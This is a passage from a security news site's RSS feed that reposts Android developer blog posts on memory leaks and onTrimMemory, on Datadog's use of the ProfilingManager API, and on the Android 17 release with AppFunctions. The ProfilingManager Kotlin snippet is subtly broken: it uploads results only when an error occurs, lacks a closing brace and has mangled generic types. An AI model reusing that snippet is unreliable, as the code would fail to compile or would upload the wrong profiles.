<p>Additionally, the leak analysis is now contextualized within the IDE and fully integrated with your source code, providing features like go to declaration and other helpful code connections that drastically reduce the friction and time required to investigate and fix memory leaks.</p>

<div>
    <h4><span>Examples of common memory leaks </span></h4>
    <p>Memory leaks occur when an object persists in memory beyond its intended lifespan. This typically happens due to:</p>
    <ul>
        <li>Retaining references to Fragments, Activities, or Views that are no longer in use.</li>
        <li>Mismanaging Context references.</li>
        <li>Failing to properly unregister observers, listeners, and receivers.</li>
        <li>Creating static references to objects that are bound to components with shorter lifecycles.</li>
    </ul>
    
    <p>Here are a few example scenarios:</p>
    
    <div align="left" dir="ltr">
        <table>
            <colgroup>
                <col>
                <col>
                <col>
            </colgroup>
            <tbody>
                <tr>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Scenario</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Compose-based example</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">View-based example</span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Leaking Context</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Example:</span><br><span face="'Google Sans',sans-serif">Passing LocalContext.current to a ViewModel</span></p>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Fix:</span><br><span face="'Google Sans',sans-serif">Keep <code>Context</code> dependent logic within the UI layer. For non-UI layers, refactor to use <a href="https://developer.android.com/training/dependency-injection">dependency injection</a> or observe UI state using <a href="https://developer.android.com/kotlin/flow">Kotlin flow</a>.</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Example:</span><br><span face="'Google Sans',sans-serif">Storing an <code>Activity</code> in a companion object or static variable.</span></p>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Fix:</span><br><span face="'Google Sans',sans-serif">Don’t hold static references to UI components. Refactor to use <a href="https://developer.android.com/training/dependency-injection">dependency injection</a> or observe UI state using <a href="https://developer.android.com/kotlin/flow">Kotlin flow</a>.</span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Leaking Listeners</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Example:</span><br><span face="'Google Sans',sans-serif">Using <code>DisposableEffect</code> to start a listener but leaving <code>onDispose</code> empty.</span></p>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Fix:</span><br><span face="'Google Sans',sans-serif">Perform the unregistration and <a href="https://developer.android.com/develop/ui/compose/side-effects#disposableeffect">cleanup logic</a> inside the <code>onDispose</code> block.</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Example:</span><br><span face="'Google Sans',sans-serif">Registering for SensorManager updates and forgetting to unregister.</span></p>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Fix:</span><br><span face="'Google Sans',sans-serif">Manually call <code>unregisterListener()</code> in <code>onStop()</code> or <code>onDestroy()</code> lifecycle.</span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Leaking Views</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Example:</span><br><span face="'Google Sans',sans-serif">Holding a reference to a legacy <code>View</code> inside an <code>AndroidView</code> without a release strategy.</span></p>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Fix:</span><br><span face="'Google Sans',sans-serif">Use the <code>release</code> block of the <code>AndroidView</code> composable to clean up the legacy <code>View</code>.</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Example:</span><br><span face="'Google Sans',sans-serif">Keeping a reference to a view binding object after the <code>Fragment</code> is destroyed.</span></p>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Fix:</span><br><span face="'Google Sans',sans-serif">Set the binding variable to <code>null</code> inside the <code>onDestroyView</code>() lifecycle method.</span></p>
                    </td>
                </tr>
            </tbody>
        </table>
    </div>
</div>

<h3>Trim memory when app leaves visible state</h3>
<p>Android can reclaim memory from your app or stop your app entirely if necessary to free up memory for critical tasks, as explained in <a href="https://developer.android.com/topic/performance/memory-overview" target="_blank">Overview of memory management</a>. Android will usually reclaim memory from your app when it’s not visible to the user, such as by discarding some of your app’s code and data pages in memory or compressing your heap allocations. When the user resumes your app and your app tries to access some memory that’s been reclaimed, the OS will swap that memory back in on demand. This swapping behavior can be slow, and cause unexpected jank or stutters in your app.</p>
<p>If you leave it to the OS to decide what memory to reclaim from your app, you may find that the OS reclaimed memory that you’ll need shortly after resuming your app. Instead, your app can voluntarily discard memory allocations that it can regenerate later, on demand and at a low cost. To do so, you can implement the <code>ComponentCallbacks2</code> interface. You can implement <code>onTrimMemory</code> in your <code>Activity</code>, <code>Fragment</code>, <code>Service</code>, or even your custom <code>Application</code> class. Using it in the <code>Application</code> class is highly effective for global cache management.</p>
<p>The provided <a href="https://developer.android.com/reference/android/content/ComponentCallbacks2#onTrimMemory(int)" target="_blank">onTrimMemory()</a> callback method notifies your app of lifecycle or memory-related events that present a good opportunity for your app to voluntarily reduce its memory usage.</p>
<p>In terms of memory lifecycle management, your implementation should focus <b>exclusively</b> on <code>TRIM_MEMORY_UI_HIDDEN</code> and <code>TRIM_MEMORY_BACKGROUND</code>. Since Android 14, the system has ceased delivering notifications for other legacy constants, which were formally deprecated in Android 15.</p>
<p><code>TRIM_MEMORY_UI_HIDDEN</code>: This signal indicates that your application's UI has transitioned out of the user's view. This provides an opportunity to release substantial memory allocations tied strictly to the interface—such as Bitmaps, video playback buffers, or complex animation resources.</p>
<p><code>TRIM_MEMORY_BACKGROUND</code>: At this level, your process is residing in the background and is now a candidate for termination to satisfy the system's global memory needs. To extend the duration your process remains in the cached state, and reduce the number of app cold starts, you should aggressively release any resources that can be easily reconstructed once the user resumes their session.</p>

<pre><code>import android.content.ComponentCallbacks2
// Other import statements.

class MainActivity : AppCompatActivity(), ComponentCallbacks2 {

    /**
     * Release memory when the UI becomes hidden or when system resources become low.
     * @param level the memory-related event that is raised.
     */
    override fun onTrimMemory(level: Int) {

        if (level &gt;= ComponentCallbacks2.TRIM_MEMORY_UI_HIDDEN) {
            // Release memory related to UI elements, such as bitmap caches.
        }

        if (level &gt;= ComponentCallbacks2.TRIM_MEMORY_BACKGROUND) {
            // Release memory related to background processing, such as by
            // closing a database connection.
        }
    }
}</code></pre>

<p>Note: The <code>onTrimMemory</code> integration may depend on SDK support. For instance, certain games rely on their game engine to enable this capability. Please check out the <a href="https://developer.android.com/games/optimize/memory-allocation" target="_blank">game memory optimization documents</a>.</p>

<h3>Advanced memory observability with ProfilingManager</h3>
<p>To catch and diagnose memory issues in the field that cannot be reproduced locally, you should leverage the <b>ProfilingManager API</b>. Introduced in Android 15, this advanced observability API allows you to programmatically collect real-user Perfetto profiles.</p>
<p>For teams that lack a dedicated infrastructure to manage and host performance artifacts, Crashlytics is exploring a specialized solution to streamline this workflow. They are inviting developers to <a href="https://docs.google.com/forms/d/e/1FAIpQLSe299a_zSNDfa164z7yyqoDjS05ZDRN86bAQKajuAOFEQ4G-w/viewform" target="_blank">provide feedback</a>.</p>

<p><b>Android 17 introduces new event-driven triggers</b>, most notably <code>TRIGGER_TYPE_OOM</code> and <code>TRIGGER_TYPE_ANOMALY</code>:</p>
<ul>
    <li>The <b>OOM trigger</b> automatically collects a Java heap dump at the exact moment an OutOfMemoryError crash occurs, providing precise allocation states. A collected OOM profile is provided the next time the app starts and registers the <code>registerForAllProfilingResults</code> callback.</li>
    <li>The <b>Anomaly trigger</b> detects severe performance issues, such as excessive binder spam or breached memory thresholds. The memory anomaly delivers a heap dump just prior to the system terminating the app.</li>
</ul>

<pre><code>  val profilingManager = 
applicationContext.getSystemService(ProfilingManager::class.java)
    val triggers = ArrayList<profilingtrigger>()  


    triggers.add(ProfilingTrigger.Builder(
                 ProfilingTrigger.TRIGGER_TYPE_ANOMALY))
    val mainExecutor: Executor = Executors.newSingleThreadExecutor()
    val resultCallback = Consumer<profilingresult> { profilingResult -&gt;
        if (profilingResult.errorCode != ProfilingResult.ERROR_NONE) {
            // upload profile result to server for further analysis          
            setupProfileUploadWorker(profilingResult.resultFilePath)
        } 

    profilingManager.registerForAllProfilingResults(mainExecutor, resultCallback)
    profilingManager.addProfilingTriggers(triggers)</profilingresult></profilingtrigger></code></pre>

<p>
    Once you’ve collected the heap dump, you can download the profile from the server, or locally via adb pull and drag and drop the file into the <a href="http://ui.perfetto.dev/" target="_blank">Perfetto UI</a>. To streamline your memory debugging workflow, use the <a href="https://perfetto.dev/docs/visualization/heap-dump-explorer" target="_blank">Heap Dump Explorer</a>, this is the new default view for heap dumps in Perfetto UI. This tool provides an intuitive interface for inspecting Java heap dumps, allowing you to visualize object allocation hierarchies, compute retained memory sizes, and identify the shortest path from garbage collection root. By leveraging the Heap Dump Explorer, you can rapidly pinpoint memory leaks, bloated retained objects such as excessive bitmap allocations, and analyze heap object allocations all in one place.
</p>

<div class="separator">
    <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhobASfyUbXdAYD_MOjREv7RUhCwoNJ9sB4QDSImRfA0UrALJqwQ2ovgAF7YRt3f26UeZoIQa-yDxiSDO84gxv1XkQ8acf8E795-IgAe4tl8AM_7m7nSEuj7t_rhtpgM3f-76_lEh-k7Rltku79-VCuIDN_2Q9DRjJyouCKbxg4pDXHV2yey7V8WlG2jQM/s2048/pic5-perfettoheapdump-analyzer.png">
        <img border="0" data-original-height="1039" data-original-width="2048" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhobASfyUbXdAYD_MOjREv7RUhCwoNJ9sB4QDSImRfA0UrALJqwQ2ovgAF7YRt3f26UeZoIQa-yDxiSDO84gxv1XkQ8acf8E795-IgAe4tl8AM_7m7nSEuj7t_rhtpgM3f-76_lEh-k7Rltku79-VCuIDN_2Q9DRjJyouCKbxg4pDXHV2yey7V8WlG2jQM/s16000/pic5-perfettoheapdump-analyzer.png">
    </a>
</div>
<div>
    <i>Use the <a href="https://perfetto.dev/docs/visualization/heap-dump-explorer">Heap Dump Explorer</a>’s embedded flamegraph to visually inspect and navigate through objects with the highest heap allocations.</i>
</div>

<h3>Conclusion</h3>
<p>Optimizing bytecode with R8, adopting image loading best practices, and resolving memory leaks are critical steps toward delivering a high-quality user experience while managing resources effectively under pressure. Adopting these proactive measures helps maintain app stability and performance, preventing unexpected terminations while safeguarding user context. To further your performance expertise, explore our revised <a href="https://developer.android.com/topic/performance/memory" target="_blank">memory guidance</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Datadog delivers millions of in-depth performance insights with ProfilingManager]]></title>
<description><![CDATA[Posted by Alice Yuan, Developer Relations Engineer at Google, Arti Arutiunov, Product Manager at Datadog and Nikita Ogorodnikov, Staff Software Engineer at Datadog


  Performance regressions are notoriously hard to reproduce, making regressions a massive bottleneck for mobile developers. Althoug...]]></description>
<link>https://tsecurity.de/de/3693507/android-tipps/datadog-delivers-millions-of-in-depth-performance-insights-with-profilingmanager/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693507/android-tipps/datadog-delivers-millions-of-in-depth-performance-insights-with-profilingmanager/</guid>
<pubDate>Sat, 25 Jul 2026 10:15:39 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/a/AVvXsEh92CmF7Hos-AKsEmr3k9Va10fhbed32pj4r9wxbUAlpyAIh2GV0KhvsRYzkmATQgflpHYdfAgdFkRfq1ki2G7ty5wKfzoaoyYknCOEjb6Auz7r0Zcfk0tR6VCX-3o3L9fpcs419uI5iNdBiOtno7ughGWD0SGJ5n3sfWPEB7ZJ9M_HQFDLhBQ_hv3HFQ8">
<p>Posted by Alice Yuan, Developer Relations Engineer at Google, Arti Arutiunov, Product Manager at Datadog and Nikita Ogorodnikov, Staff Software Engineer at Datadog</p><p></p><p></p><div class="separator"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjICmOZHTF4gmgXj1G4r5Fp48jM_W4fN9tjxbdnesvaxjUsuwmrftmILW-CErt5cXGcZp93UGtLy8fBehhZxwZ2oxtjQLNb269jHfkNA3XBHnn9JIVZbApeatdCi9gX6ylK7-5A-DzQ3VSRi8hJCNp_8699CzeD9H0y26Tl-6DO8FIafh9UQFyrpa_C9DA"><img alt="" data-original-height="1253" data-original-width="4209" src="https://blogger.googleusercontent.com/img/a/AVvXsEjICmOZHTF4gmgXj1G4r5Fp48jM_W4fN9tjxbdnesvaxjUsuwmrftmILW-CErt5cXGcZp93UGtLy8fBehhZxwZ2oxtjQLNb269jHfkNA3XBHnn9JIVZbApeatdCi9gX6ylK7-5A-DzQ3VSRi8hJCNp_8699CzeD9H0y26Tl-6DO8FIafh9UQFyrpa_C9DA=s16000"></a></div><br><br><p></p>

<p>
  Performance regressions are notoriously hard to reproduce, making regressions a massive bottleneck for mobile developers. Although signals like ANR rates indicate what issues occur in production, pinpointing the specific line of code that resulted in the performance issue has historically necessitated exhaustive manual reproduction or speculative trial-and-error experimentation.
</p>

<p>Datadog collaborated with Google to mitigate this frustration by integrating the ProfilingManager API (available on Android 15+ devices) into its Real User Monitoring (RUM) and Continuous Profiling platforms. This integration transforms the debugging workflow, allowing developers to move beyond surface-level symptoms to being able to detect the <em>why</em> behind a performance bottleneck.
</p>

By leveraging this system-level API, Datadog now processes millions of production profiles weekly across the globe according to Datadog internal data of June 2026. It provides engineering teams with a new level of visibility into real-world performance, all while maintaining a low runtime overhead for production-scale performance monitoring.

<h3>The impact of ProfilingManager</h3><p>
  ProfilingManager is a system service introduced in Android 15 that enables apps to programmatically collect performance data such as call stack samples, field traces and memory heap dumps directly from production environments. This capability shifts the engineering paradigm from reactive manual reproduction to proactive field analysis.</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWVOhdnTTwX9DT3ROPHDLHKm1aJ8Z0vo5wYsHTULe7oRBqsi2-pTblEC1ggNuVXdd5rCZv6RooG4dsdOqMM_8URLUxierH3KjujbTyVSFrqNIs01zMqb_o7uXFeYECms5s_CkX1WvAPaQeO5W9bpnvD4S4BNN0mH9qbanuTukvCg8LTozhNEhY0CQ0o0Q/s1280/AANDDM_DataDog_Quote_01.png"><img alt="ProfilingManager is a highly performant solution for code-level insights.  Of the solutions we evaluated, it has the lowest runtime overhead,  gives deep visibility into Java, Kotlin, and C++ traces, and opens the door to gather memory profiles and system-level traces during critical moments like ANRs and out-of-memory (OOM) errors. Yi Lu, Senior Engineer at Datadog" border="0" data-original-height="720" data-original-width="1280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWVOhdnTTwX9DT3ROPHDLHKm1aJ8Z0vo5wYsHTULe7oRBqsi2-pTblEC1ggNuVXdd5rCZv6RooG4dsdOqMM_8URLUxierH3KjujbTyVSFrqNIs01zMqb_o7uXFeYECms5s_CkX1WvAPaQeO5W9bpnvD4S4BNN0mH9qbanuTukvCg8LTozhNEhY0CQ0o0Q/s16000/AANDDM_DataDog_Quote_01.png"></a></div><br><p><br></p>

For example, a Google communications app used field traces to investigate why its cold start times were slower on newer, more powerful hardware. By diving into the field-collected traces and comparing traces across different device types, the engineer discovered a hidden scheduling issue: a background text-to-speech service was unnecessarily being prewarmed during app startup. The traces revealed that this background process was monopolizing the device's highest-performing big CPU core, forcing the app's main thread to sleep while the prewarm occurred.

<h3>Solving the Android code-level visibility challenge</h3><p>
  Prior to the implementation of ProfilingManager, Datadog’s Real User Monitoring (RUM) focused on high-level application health and session-level telemetry to assess the user journey. Engineering teams could monitor Android performance signals like time to initial display, ANR rates, CPU load, and frozen frames. These insights extended to granular interactions, such as network latency, touch events, and main thread hangs. However, while this data effectively highlighted which performance bottlenecks were surfacing in the field, it provided no clear path to identifying the root cause of these failures.</p><div><span face='"Google Sans", sans-serif'><br></span></div><p></p><div class="separator"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjW4Lm-zE5X2trjidQ0eh9i_Bhiwd7HnkOcMeRtA_4dABpGG0EPuer564cLFK4o3eb_N_zWmBAgpOa58eygLH5hwFF6kMg_4GFC98vRN4pd1LNZ-PG9W5wyHv-ptVcmIGo1M7FNPi9PKQ9iGsyZeVfr5jDK46HJHU-1Gsc6IZJdSvhrZVavqKiZmyYar0o"><img alt="We realized that across our profiling features, performance profiling on mobile applications remained a blind spot. Teams could see that an Android user experienced a slow screen render or an ANR, but lacked the same code-level visibility they relied on for their backend services. - Bryan Antigua, Senior Product Manager at Datadog" data-original-height="720" data-original-width="1280" src="https://blogger.googleusercontent.com/img/a/AVvXsEjW4Lm-zE5X2trjidQ0eh9i_Bhiwd7HnkOcMeRtA_4dABpGG0EPuer564cLFK4o3eb_N_zWmBAgpOa58eygLH5hwFF6kMg_4GFC98vRN4pd1LNZ-PG9W5wyHv-ptVcmIGo1M7FNPi9PKQ9iGsyZeVfr5jDK46HJHU-1Gsc6IZJdSvhrZVavqKiZmyYar0o=s16000"></a></div><br><br><p></p>

<p>
  To address this, Datadog needed a profiling engine capable of capturing Android traces directly from devices in production with minimal performance impact. After evaluating alternative approaches, such as writing their own trace processor using Android Debug APIs, the team selected ProfilingManager because it is the most performant solution of the profiling options they evaluated and offloads the sampling decisions overhead to the OS.
</p>

<p>
  ProfilingManager supports a wide range of collection methods, including CPU traces, call stack sampling, memory analysis through Java heap dumps and native heap profiles. It enables developers to profile production builds, upload trace files to external storage, and review them in the Perfetto trace analyzer UI. As a SaaS provider, Datadog uploads, visualizes, and analyzes these profiles collected via its SDK, providing a unified view of application health. 
</p>

By centralizing high-fidelity telemetry within a unified observability API, ProfilingManager empowers Datadog and its clients to proactively monitor, investigate, and remediate complex Android performance regressions through key technical advantages:

<ul>
  <li>
    <strong>Granular session diagnostics:</strong> ProfilingManager enhances debuggability by delivering direct OS-level trace data, overcoming the visibility and alignment challenges typical of custom logging with system services. To dive deeper, developers can download these traces from Datadog to investigate further in visualization tools like the <a href="https://ui.perfetto.dev/">Perfetto UI</a>. 
  </li>
  <li>
    <strong>Automated telemetry triggers:</strong> By leveraging native system events to initiate trace recordings at key optimization points, Datadog reduces the need to build custom collection logic. While the initial rollout focuses on the <a href="https://developer.android.com/reference/android/os/ProfilingTrigger?_gl=1*xix6h8*_up*MQ..*_ga*MTc4ODI2NDgwMy4xNzc5MzE2ODcw*_ga_6HH9YJMN9M*czE3NzkzMTY4NzAkbzEkZzAkdDE3NzkzMTY4NzAkajYwJGwwJGgyMTE1NzIyNjk1#TRIGGER_TYPE_APP_FULLY_DRAWN">APP_FULLY_DRAWN </a>signal, there are already plans to expand this observability to include <a href="https://developer.android.com/reference/android/os/ProfilingTrigger?_gl=1*1hl4p7n*_up*MQ..*_ga*MTc4ODI2NDgwMy4xNzc5MzE2ODcw*_ga_6HH9YJMN9M*czE3NzkzMTY4NzAkbzEkZzAkdDE3NzkzMTY4NzAkajYwJGwwJGgyMTE1NzIyNjk1#TRIGGER_TYPE_ANR">ANR</a>, <a href="https://developer.android.com/reference/android/os/ProfilingTrigger?_gl=1*8x3pd*_up*MQ..*_ga*MTc4ODI2NDgwMy4xNzc5MzE2ODcw*_ga_6HH9YJMN9M*czE3NzkzMTY4NzAkbzEkZzAkdDE3NzkzMTY4NzAkajYwJGwwJGgyMTE1NzIyNjk1#TRIGGER_TYPE_OOM">OOM</a>, and <a href="https://developer.android.com/reference/android/os/ProfilingTrigger?_gl=1*1ezx2ma*_up*MQ..*_ga*MTc4ODI2NDgwMy4xNzc5MzE2ODcw*_ga_6HH9YJMN9M*czE3NzkzMTY4NzAkbzEkZzAkdDE3NzkzMTY4NzAkajYwJGwwJGgyMTE1NzIyNjk1#TRIGGER_TYPE_COLD_START">COLD_START</a> triggers.</li>
  <li>
    <strong>Proactive trace snapshots:</strong> By interfacing directly with the system-level Perfetto service (traced), ProfilingManager utilizes a proactive background recording model designed to capture unpredictable issues. This ensures that developers receive a precise visualization of the events leading up to a performance anomaly, offering a level of insight that exceeds what is possible through manual instrumentation. 
  </li>
  <li>
    <strong>Bottleneck detection at scale:</strong> Datadog is able to synthesize telemetry from across Datadog’s global customer base to uncover regressions that only emerge under unique hardware configurations and variable network environments.
  </li>
  <li>
    <strong>System-enforced resource stability:</strong> The API leverages sampling trace collection to ensure performance and user experience impacts remain unnoticeable.
  </li>
  <li>
    <strong>On-device data controls:</strong> ProfilingManager filters out irrelevant information from other processes on-device before the profile is delivered to the app. This minimizes file sizes and ensures that only data relevant to the app's processes is provided.</li>
</ul>

<h3>Processing millions of weekly profiles to optimize real-world apps</h3><p></p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr2ikpIrv_Km0RiIq-khGPFHpfA5CRYHfnLj2oRxLSuTk2x8qJFoO4UyNiwMpJphecSAVR4aWcJEB7BzvkXYjkyDggRDUYhLTBGhoj5q3b6BmwA5IcsER1_k5tffie6pteW3YNkIwI5Y6rG_Ie35Xzzq-mEnfq8iinA_cd_r5ydCxfRwajPSngrY1591k/s3464/datadog-profiling-blogpost-final.png"><img border="0" data-original-height="1686" data-original-width="3464" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr2ikpIrv_Km0RiIq-khGPFHpfA5CRYHfnLj2oRxLSuTk2x8qJFoO4UyNiwMpJphecSAVR4aWcJEB7BzvkXYjkyDggRDUYhLTBGhoj5q3b6BmwA5IcsER1_k5tffie6pteW3YNkIwI5Y6rG_Ie35Xzzq-mEnfq8iinA_cd_r5ydCxfRwajPSngrY1591k/s16000/datadog-profiling-blogpost-final.png"></a></div><i><div><i>An example of Datadog's time to initial display measurement with </i></div><div><i>stack sampling powered by ProfilingManager</i></div></i><br>Integrating a system-level profiling API into a global monitoring SDK required solving infrastructure challenges. Because ProfilingManager generates highly detailed performance traces, the Datadog engineering team had to build a pipeline capable of parsing and analyzing these profiles on the server side at scale. <span><span>Beyond profile collection, Datadog also emphasizes the importance of balancing sampling frequency with collecting enough data to generate meaningful insights about your application. </span></span>Datadog relies on ProfilingManager’s built-in rate limiting as a critical stability safeguard, preventing excessive telemetry requests from overburdening user devices.<br><br>The team has been profiling Datadog's own native Android application and a number of early adopters’ applications for months, gathering millions of profiles to ensure a fast, error-free launch experience and to refine their performance-detection algorithms. Today, the production integration seamlessly scales across a variety of Android devices. <p></p><h3>Conclusion</h3><p>By integrating Android’s ProfilingManager API, Datadog successfully closed the visibility gap between backend systems and mobile client applications for their customers. By processing millions of profiles weekly with negligible device overhead, Datadog equips Android developers with the code-level insights necessary to diagnose complex performance bugs instantly, helping developers build smoother applications and improve their app’s performance signals in the Play Store. To adopt the ProfilingManager API directly into your performance observability framework, check out our <a href="https://developer.android.com/topic/performance/tracing/profiling-manager/overview">documentation</a>.</p>

<p>
  In the future, Datadog aims to make Android profiling data a first-class input for coding agents to autonomously resolve performance bottlenecks, closing the feedback loop between detection and remediation. Datadog is working toward making Android profiling broadly accessible to developers.
</p>

<p>
  To get started using the Datadog real user monitoring feature powered by ProfilingManager, visit <a href="https://www.datadoghq.com/dg/real-user-monitoring/android-profiling/?utm_source=inbound&amp;utm_medium=corpsite-display&amp;utm_campaign=int-rum-ww-blog-announcement-announcement-androidprofilerblog2026">Datadog Mobile Real User Monitoring</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Android 17 is here]]></title>
<description><![CDATA[Posted by Matthew McCullough, VP of Product Management, Android DeveloperToday we're releasing Android 17 and making it available on most supported Pixel devices. Look for new devices running Android 17 in the coming months.

Android 17 marks the start of our transition to an intelligence system,...]]></description>
<link>https://tsecurity.de/de/3693505/android-tipps/android-17-is-here/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693505/android-tipps/android-17-is-here/</guid>
<pubDate>Sat, 25 Jul 2026 10:15:36 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgV7zuuXjulHty999mGDWY1kfL8Q9SXjYYWn-7JTpMfVdNP78eb5fW9shOpvVdEqK0WnNp7AhdO0qc7pXAaqcfTwXgOGsfZyqcQv8wyD-9niWBpZuP6ZAPHBSetWenN2lMlRS5wi2d71-n8RCYqrLsFhUCEvM7KeoGLnNaDbiyOZQ0vvyr0O580nXK4Vas/s2048/Metadata%20-%20Static.png"><div><i>Posted by Matthew McCullough, VP of Product Management, Android Developer</i></div><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5KPJZylMSUXRpKFRUd6oM4fNdEoDRdJzdkzg69P_BVUuIDtXqCqTid6hGH40CoHRw7-f50HsT6rISArklGH982MM4K1jKU16SSymes4JPoE4qOZ5s1lLnkbInpUpdJGu5erAYmSgiefzkkOX_ng3AUJKOzzwC1WMTjk2DxLNia8R1C-ErWc7jT4VP8ew/s4209/Blogger%20Hero%20-%20White.png"><img border="0" data-original-height="1253" data-original-width="4209" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5KPJZylMSUXRpKFRUd6oM4fNdEoDRdJzdkzg69P_BVUuIDtXqCqTid6hGH40CoHRw7-f50HsT6rISArklGH982MM4K1jKU16SSymes4JPoE4qOZ5s1lLnkbInpUpdJGu5erAYmSgiefzkkOX_ng3AUJKOzzwC1WMTjk2DxLNia8R1C-ErWc7jT4VP8ew/s16000/Blogger%20Hero%20-%20White.png"></a></div><br><p><br></p><p>Today we're releasing Android 17 and making it available on most supported Pixel devices. Look for new devices running Android 17 in the coming months.</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjaHGBWXu3yvdXZ-wYQgN6DjN5TEMRIYDJvQDZTOybRZFWsAMhqhl14b9UZmrlXlEIRDioqRc8m3xRjOnQHJPoICkVpCho4qrmKihPbu_SB7dGVNKwlAaX6eWdjLF4VUdGyzGfxtW0ziFggj63e778VVo38qpMKar4E1wuw0MiPCBvBdrTTXCgI1XD04Q/s1080/AfD-Android-17.gif"><img border="0" data-original-height="1080" data-original-width="1080" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjaHGBWXu3yvdXZ-wYQgN6DjN5TEMRIYDJvQDZTOybRZFWsAMhqhl14b9UZmrlXlEIRDioqRc8m3xRjOnQHJPoICkVpCho4qrmKihPbu_SB7dGVNKwlAaX6eWdjLF4VUdGyzGfxtW0ziFggj63e778VVo38qpMKar4E1wuw0MiPCBvBdrTTXCgI1XD04Q/s320/AfD-Android-17.gif" width="320"></a></div>

<p>Android 17 marks the start of our transition to an intelligence system, putting your apps at the center. It's shifting to an adaptive-first development standard by introducing mandatory large-screen resizability, all while delivering next-generation privacy, security, media, camera, and performance. We'll cover all that in this post, as well as how we're bringing together next generation tools, libraries, and agent skills to help your apps embrace the opportunity.</p>

<p>Throughout the past year, from our Canary channel to our Beta releases, we’ve collaborated with you in the developer community to build a platform you and your users can trust. To that end, this moment marks the availability of the source code at the <a href="https://source.android.com/">Android Open Source Project</a> (AOSP). This allows you to <a href="https://cs.android.com/">examine the source code</a> for a deeper understanding of how Android works.</p>

<p>Let's dive deeper into Android 17.</p>

<h3>An intelligence system</h3>

<p>With deep integration between hardware, software and AI, we’re transforming Android from an operating system to an intelligence system. It's about delivering new helpful experiences that anticipate user needs, and it brings more opportunities for engagement with your apps. To that end, Android 17 expands the capabilities of AppFunctions, a platform API with a corresponding Jetpack library. It allows you to contribute your app's unique capabilities as orchestratable "tools" for Android MCP, the on-device equivalent of the <a href="https://modelcontextprotocol.io/">Model Context Protocol</a>. AI agents and assistants (like Google Gemini) can discover and execute AppFunctions to perform workflows on behalf of the user with direct access to the app's local state.</p>

<p>The Jetpack library, currently in alpha, makes adding AppFunctions as easy as annotating a class and adding KDoc comments.</p>

<pre><code>/**
 * A note app's [AppFunction]s.
 */
class NoteFunctions(
    private val noteRepository: NoteRepository
) {
    /**
     * Adds a new note to the app.
     *
     * @param appFunctionContext The execution context.
     * @param title The title of the note.
     * @param content The note's content.
     */
    @AppFunction(isDescribedByKDoc = true)
    suspend fun createNote(
        appFunctionContext: AppFunctionContext,
        title: String,
        content: String
    ): Note {
        return noteRepository.createNote(title, content)
    }
}</code></pre>

<p>We’ve also launched an <a href="http://github.com/android/skills/tree/main/on-device/appfunctions">AppFunctions agent skill</a> that analyzes your app’s key workflows, automatically generates the required Kotlin code, optimizes your KDocs for LLM tool-calling, and provides ADB commands for testing and debugging.</p>

<p>The Gemini integration is currently in a private preview with trusted testers, but you can begin preparing your apps now. In addition to ADB commands to execute your AppFunctions, we've provided a <a href="http://github.com/android/appfunctions/releases/initial">test agent app</a> that includes an interface to discover and execute your app functions and simulate an AI agent integration. Join our integration early access program at <a href="http://goo.gle/eap-af">goo.gle/eap-af</a> for a chance to be among the first apps to deploy AppFunctions to production.</p>

<h3>Adaptive-first</h3>
<p>Your users no longer rely on a single form factor; they transition between phones, foldables, tablets, laptops, automotive displays, and immersive XR environments. Now, with over <a href="https://developer.android.com/blog/posts/adaptive-development-for-the-expanding-android-ecosystem">580 million large screen devices</a> in the hands of users and the <a href="https://blog.google/products-and-platforms/platforms/android/meet-googlebook/">forthcoming launch of Googlebooks</a>, the next generation of ChromeOS built on the Android stack, adaptive is no longer just a technical goal. It’s a massive opportunity to reach highly engaged users, which is one of the reasons we're shifting to an <a href="https://developer.android.com/adaptive-apps">adaptive-first development standard</a>.</p>

<h2>No resizability/orientation restrictions on large screens</h2>
